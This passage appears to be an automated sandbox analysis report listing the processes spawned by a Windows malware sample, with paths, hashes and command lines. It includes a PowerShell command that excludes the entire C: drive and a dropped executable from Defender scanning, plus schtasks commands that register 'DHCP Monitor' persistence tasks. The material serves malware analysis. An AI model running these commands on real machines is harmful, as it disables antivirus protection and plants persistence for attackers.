Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
Imagebase: 0x1260000
File size: 430592 bytes
MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 09:33:44
Start date: 22/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:33:45
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
Imagebase: 0xe40000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:33:47
Start date: 22/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6b2800000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 09:33:49
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
Imagebase: 0xe40000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                          General

                                                                          Start time:09:33:49
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:50
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
                                                                          Imagebase:0xca0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                                                                          Imagebase:0x2a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal, Browse
                                                                          • Detection: 0%, Metadefender, Browse
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:56
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                          Imagebase:0x8a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET

                                                                          General

                                                                          Start time:09:33:57
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
